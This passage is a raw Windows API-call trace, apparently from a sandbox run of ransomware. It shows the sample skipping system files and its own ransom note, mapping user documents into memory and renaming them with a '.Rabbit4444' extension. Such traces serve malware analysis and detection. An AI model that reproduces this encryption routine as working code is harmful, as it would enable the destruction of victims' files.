Flags=0x8, Size=0x100) returned 0xf12e0 [0049.750] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0049.750] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.750] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0049.750] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.751] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0049.751] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.751] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0049.751] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14106153202) returned 1 [0049.751] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0049.751] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0049.751] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.751] CloseHandle (hObject=0x298) returned 1 [0049.751] CloseHandle (hObject=0x278) returned 1 [0049.753] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\gE99JrIwutT0tFxNz.odt.Rabbit4444") returned 96 [0049.753] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\gE99JrIwutT0tFxNz.odt" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\ge99jriwutt0tfxnz.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\gE99JrIwutT0tFxNz.odt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\ge99jriwutt0tfxnz.odt.rabbit4444"), dwFlags=0x1) returned 1 [0049.753] InterlockedExchangeAdd (in: Addend=0xff618, Value=27456 | out: Addend=0xff618) returned 23011184 [0049.753] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3681 [0049.753] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cc77f10, ftCreationTime.dwHighDateTime=0x1d4d16a, ftLastAccessTime.dwLowDateTime=0xf52fde60, ftLastAccessTime.dwHighDateTime=0x1d4ccbc, ftLastWriteTime.dwLowDateTime=0xf52fde60, ftLastWriteTime.dwHighDateTime=0x1d4ccbc, nFileSizeHigh=0x0, nFileSizeLow=0x17a84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GVj2hhi0gvWSRVrHTCP.pps", cAlternateFileName="GVJ2HH~1.PPS")) returned 1 [0049.753] lstrcmpiW (lpString1="GVj2hhi0gvWSRVrHTCP.pps", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.753] lstrcmpiW (lpString1="GVj2hhi0gvWSRVrHTCP.pps", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.753] lstrcmpiW (lpString1="GVj2hhi0gvWSRVrHTCP.pps", lpString2="Rabbit4444.exe") returned -1 [0049.754] lstrcmpiW (lpString1="GVj2hhi0gvWSRVrHTCP.pps", lpString2=".") returned 1 [0049.754] lstrcmpiW (lpString1="GVj2hhi0gvWSRVrHTCP.pps", lpString2="..") returned 1 [0049.754] lstrcmpiW (lpString1="GVj2hhi0gvWSRVrHTCP.pps", lpString2="windows") returned -1 [0049.754] lstrcmpiW (lpString1="GVj2hhi0gvWSRVrHTCP.pps", lpString2="bootmgr") returned 1 [0049.754] lstrcmpiW (lpString1="GVj2hhi0gvWSRVrHTCP.pps", lpString2="pagefile.sys") returned -1 [0049.754] lstrcmpiW (lpString1="GVj2hhi0gvWSRVrHTCP.pps", lpString2="boot") returned 1 [0049.754] lstrcmpiW (lpString1="GVj2hhi0gvWSRVrHTCP.pps", lpString2="ids.txt") returned -1 [0049.754] lstrcmpiW (lpString1="GVj2hhi0gvWSRVrHTCP.pps", lpString2="NTUSER.DAT") returned -1 [0049.754] lstrcpyW (in: lpString1=0x130ebb8, lpString2="GVj2hhi0gvWSRVrHTCP.pps" | out: lpString1="GVj2hhi0gvWSRVrHTCP.pps") returned="GVj2hhi0gvWSRVrHTCP.pps" [0049.754] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\GVj2hhi0gvWSRVrHTCP.pps", dwFileAttributes=0x0) returned 1 [0049.754] lstrlenW (lpString="GVj2hhi0gvWSRVrHTCP.pps") returned 23 [0049.754] lstrlenW (lpString="Rabbit4444") returned 10 [0049.754] lstrcmpiW (lpString1="VrHTCP.pps", lpString2="Rabbit4444") returned 1 [0049.754] lstrlenW (lpString=".dll") returned 4 [0049.754] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0049.754] lstrlenW (lpString=".lnk") returned 4 [0049.754] lstrcmpiW (lpString1=".pps", lpString2=".lnk") returned 1 [0049.754] lstrlenW (lpString=".ini") returned 4 [0049.754] lstrcmpiW (lpString1=".pps", lpString2=".ini") returned 1 [0049.754] lstrlenW (lpString=".sys") returned 4 [0049.754] lstrcmpiW (lpString1=".pps", lpString2=".sys") returned -1 [0049.754] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\GVj2hhi0gvWSRVrHTCP.pps" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\gvj2hhi0gvwsrvrhtcp.pps"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.754] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.754] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14106524103) returned 1 [0049.755] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=96900) returned 1 [0049.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0049.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0049.755] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17d90, lpName=0x0) returned 0x298 [0049.755] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17d90) returned 0x70000 [0049.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0049.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0049.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0049.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0049.758] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14106833089) returned 1 [0049.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0049.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0049.758] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.759] CloseHandle (hObject=0x298) returned 1 [0049.759] CloseHandle (hObject=0x278) returned 1 [0049.759] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\GVj2hhi0gvWSRVrHTCP.pps.Rabbit4444") returned 98 [0049.760] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\GVj2hhi0gvWSRVrHTCP.pps" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\gvj2hhi0gvwsrvrhtcp.pps"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\GVj2hhi0gvWSRVrHTCP.pps.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\gvj2hhi0gvwsrvrhtcp.pps.rabbit4444"), dwFlags=0x1) returned 1 [0049.760] InterlockedExchangeAdd (in: Addend=0xff618, Value=96912 | out: Addend=0xff618) returned 23038640 [0049.760] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3683 [0049.760] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x459b840, ftCreationTime.dwHighDateTime=0x1d4d08a, ftLastAccessTime.dwLowDateTime=0xc8b66620, ftLastAccessTime.dwHighDateTime=0x1d4ce41, ftLastWriteTime.dwLowDateTime=0xc8b66620, ftLastWriteTime.dwHighDateTime=0x1d4ce41, nFileSizeHigh=0x0, nFileSizeLow=0x13fc8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MRzyzETcP.odt", cAlternateFileName="MRZYZE~1.ODT")) returned 1 [0049.760] lstrcmpiW (lpString1="MRzyzETcP.odt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.760] lstrcmpiW (lpString1="MRzyzETcP.odt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.760] lstrcmpiW (lpString1="MRzyzETcP.odt", lpString2="Rabbit4444.exe") returned -1 [0049.760] lstrcmpiW (lpString1="MRzyzETcP.odt", lpString2=".") returned 1 [0049.760] lstrcmpiW (lpString1="MRzyzETcP.odt", lpString2="..") returned 1 [0049.760] lstrcmpiW (lpString1="MRzyzETcP.odt", lpString2="windows") returned -1 [0049.760] lstrcmpiW (lpString1="MRzyzETcP.odt", lpString2="bootmgr") returned 1 [0049.760] lstrcmpiW (lpString1="MRzyzETcP.odt", lpString2="pagefile.sys") returned -1 [0049.760] lstrcmpiW (lpString1="MRzyzETcP.odt", lpString2="boot") returned 1 [0049.760] lstrcmpiW (lpString1="MRzyzETcP.odt", lpString2="ids.txt") returned 1 [0049.760] lstrcmpiW (lpString1="MRzyzETcP.odt", lpString2="NTUSER.DAT") returned -1 [0049.760] lstrcpyW (in: lpString1=0x130ebb8, lpString2="MRzyzETcP.odt" | out: lpString1="MRzyzETcP.odt") returned="MRzyzETcP.odt" [0049.760] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\MRzyzETcP.odt", dwFileAttributes=0x0) returned 1 [0049.761] lstrlenW (lpString="MRzyzETcP.odt") returned 13 [0049.761] lstrlenW (lpString="Rabbit4444") returned 10 [0049.761] lstrcmpiW (lpString1="yzETcP.odt", lpString2="Rabbit4444") returned 1 [0049.761] lstrlenW (lpString=".dll") returned 4 [0049.761] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0049.761] lstrlenW (lpString=".lnk") returned 4 [0049.761] lstrcmpiW (lpString1=".odt", lpString2=".lnk") returned 1 [0049.761] lstrlenW (lpString=".ini") returned 4 [0049.761] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0049.761] lstrlenW (lpString=".sys") returned 4 [0049.761] lstrcmpiW (lpString1=".odt", lpString2=".sys") returned -1 [0049.761] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\MRzyzETcP.odt" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\mrzyzetcp.odt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.761] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.761] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14107185525) returned 1 [0049.761] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=81864) returned 1 [0049.761] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0049.761] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0049.761] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x142d0, lpName=0x0) returned 0x298 [0049.761] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x142d0) returned 0x70000 [0049.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0049.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0049.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0049.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0049.764] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14107502628) returned 1 [0049.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0049.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0049.764] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.765] CloseHandle (hObject=0x298) returned 1 [0049.765] CloseHandle (hObject=0x278) returned 1 [0049.766] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\MRzyzETcP.odt.Rabbit4444") returned 88 [0049.766] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\MRzyzETcP.odt" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\mrzyzetcp.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\MRzyzETcP.odt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\mrzyzetcp.odt.rabbit4444"), dwFlags=0x1) returned 1 [0049.766] InterlockedExchangeAdd (in: Addend=0xff618, Value=81872 | out: Addend=0xff618) returned 23135552 [0049.766] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3686 [0049.767] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeca4b3d0, ftCreationTime.dwHighDateTime=0x1d4c62a, ftLastAccessTime.dwLowDateTime=0xc7dcfbc0, ftLastAccessTime.dwHighDateTime=0x1d4ccf1, ftLastWriteTime.dwLowDateTime=0xc7dcfbc0, ftLastWriteTime.dwHighDateTime=0x1d4ccf1, nFileSizeHigh=0x0, nFileSizeLow=0xed10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Q7T abSZv.ots", cAlternateFileName="Q7TABS~1.OTS")) returned 1 [0049.767] lstrcmpiW (lpString1="Q7T abSZv.ots", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.767] lstrcmpiW (lpString1="Q7T abSZv.ots", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.767] lstrcmpiW (lpString1="Q7T abSZv.ots", lpString2="Rabbit4444.exe") returned -1 [0049.767] lstrcmpiW (lpString1="Q7T abSZv.ots", lpString2=".") returned 1 [0049.767] lstrcmpiW (lpString1="Q7T abSZv.ots", lpString2="..") returned 1 [0049.767] lstrcmpiW (lpString1="Q7T abSZv.ots", lpString2="windows") returned -1 [0049.767] lstrcmpiW (lpString1="Q7T abSZv.ots", lpString2="bootmgr") returned 1 [0049.767] lstrcmpiW (lpString1="Q7T abSZv.ots", lpString2="pagefile.sys") returned 1 [0049.767] lstrcmpiW (lpString1="Q7T abSZv.ots", lpString2="boot") returned 1 [0049.767] lstrcmpiW (lpString1="Q7T abSZv.ots", lpString2="ids.txt") returned 1 [0049.767] lstrcmpiW (lpString1="Q7T abSZv.ots", lpString2="NTUSER.DAT") returned 1 [0049.767] lstrcpyW (in: lpString1=0x130ebb8, lpString2="Q7T abSZv.ots" | out: lpString1="Q7T abSZv.ots") returned="Q7T abSZv.ots" [0049.767] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\Q7T abSZv.ots", dwFileAttributes=0x0) returned 1 [0049.767] lstrlenW (lpString="Q7T abSZv.ots") returned 13 [0049.767] lstrlenW (lpString="Rabbit4444") returned 10 [0049.767] lstrcmpiW (lpString1=" abSZv.ots", lpString2="Rabbit4444") returned -1 [0049.767] lstrlenW (lpString=".dll") returned 4 [0049.767] lstrcmpiW (lpString1=".ots", lpString2=".dll") returned 1 [0049.767] lstrlenW (lpString=".lnk") returned 4 [0049.767] lstrcmpiW (lpString1=".ots", lpString2=".lnk") returned 1 [0049.767] lstrlenW (lpString=".ini") returned 4 [0049.767] lstrcmpiW (lpString1=".ots", lpString2=".ini") returned 1 [0049.767] lstrlenW (lpString=".sys") returned 4 [0049.767] lstrcmpiW (lpString1=".ots", lpString2=".sys") returned -1 [0049.767] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\Q7T abSZv.ots" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\q7t abszv.ots"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.768] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.768] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14107832490) returned 1 [0049.768] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=60688) returned 1 [0049.768] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0049.768] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0049.768] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf010, lpName=0x0) returned 0x298 [0049.768] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf010) returned 0x70000 [0049.770] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x101628) returned 1 [0049.770] CryptGenRandom (in: hProv=0x101628, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0049.770] CryptReleaseContext (hProv=0x101628, dwFlags=0x0) returned 1 [0049.770] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.770] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0049.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.770] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.771] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.771] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.771] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.771] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0049.771] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14108163515) returned 1 [0049.771] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0049.771] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0049.771] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.772] CloseHandle (hObject=0x298) returned 1 [0049.772] CloseHandle (hObject=0x278) returned 1 [0049.772] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\Q7T abSZv.ots.Rabbit4444") returned 88 [0049.772] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\Q7T abSZv.ots" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\q7t abszv.ots"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\Q7T abSZv.ots.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\q7t abszv.ots.rabbit4444"), dwFlags=0x1) returned 1 [0049.773] InterlockedExchangeAdd (in: Addend=0xff618, Value=60688 | out: Addend=0xff618) returned 23217424 [0049.773] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3689 [0049.773] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x259f4d70, ftCreationTime.dwHighDateTime=0x1d4c9ce, ftLastAccessTime.dwLowDateTime=0x6faf27a0, ftLastAccessTime.dwHighDateTime=0x1d4d4eb, ftLastWriteTime.dwLowDateTime=0x6faf27a0, ftLastWriteTime.dwHighDateTime=0x1d4d4eb, nFileSizeHigh=0x0, nFileSizeLow=0xabc8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r c_-ee.xls", cAlternateFileName="RC_-EE~1.XLS")) returned 1 [0049.773] lstrcmpiW (lpString1="r c_-ee.xls", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.773] lstrcmpiW (lpString1="r c_-ee.xls", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.773] lstrcmpiW (lpString1="r c_-ee.xls", lpString2="Rabbit4444.exe") returned -1 [0049.773] lstrcmpiW (lpString1="r c_-ee.xls", lpString2=".") returned 1 [0049.773] lstrcmpiW (lpString1="r c_-ee.xls", lpString2="..") returned 1 [0049.773] lstrcmpiW (lpString1="r c_-ee.xls", lpString2="windows") returned -1 [0049.773] lstrcmpiW (lpString1="r c_-ee.xls", lpString2="bootmgr") returned 1 [0049.773] lstrcmpiW (lpString1="r c_-ee.xls", lpString2="pagefile.sys") returned 1 [0049.773] lstrcmpiW (lpString1="r c_-ee.xls", lpString2="boot") returned 1 [0049.773] lstrcmpiW (lpString1="r c_-ee.xls", lpString2="ids.txt") returned 1 [0049.773] lstrcmpiW (lpString1="r c_-ee.xls", lpString2="NTUSER.DAT") returned 1 [0049.773] lstrcpyW (in: lpString1=0x130ebb8, lpString2="r c_-ee.xls" | out: lpString1="r c_-ee.xls") returned="r c_-ee.xls" [0049.773] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\r c_-ee.xls", dwFileAttributes=0x0) returned 1 [0049.774] lstrlenW (lpString="r c_-ee.xls") returned 11 [0049.774] lstrlenW (lpString="Rabbit4444") returned 10 [0049.774] lstrcmpiW (lpString1=" c_-ee.xls", lpString2="Rabbit4444") returned -1 [0049.774] lstrlenW (lpString=".dll") returned 4 [0049.774] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0049.774] lstrlenW (lpString=".lnk") returned 4 [0049.774] lstrcmpiW (lpString1=".xls", lpString2=".lnk") returned 1 [0049.774] lstrlenW (lpString=".ini") returned 4 [0049.774] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0049.774] lstrlenW (lpString=".sys") returned 4 [0049.774] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0049.774] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\r c_-ee.xls" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\r c_-ee.xls"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.774] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.774] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14108475022) returned 1 [0049.774] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=43976) returned 1 [0049.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0049.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0049.774] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xaed0, lpName=0x0) returned 0x298 [0049.774] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaed0) returned 0x70000 [0049.775] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.775] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0049.776] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.776] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0049.776] RtlAllocateHeap (HeapHandle=0xe0000, 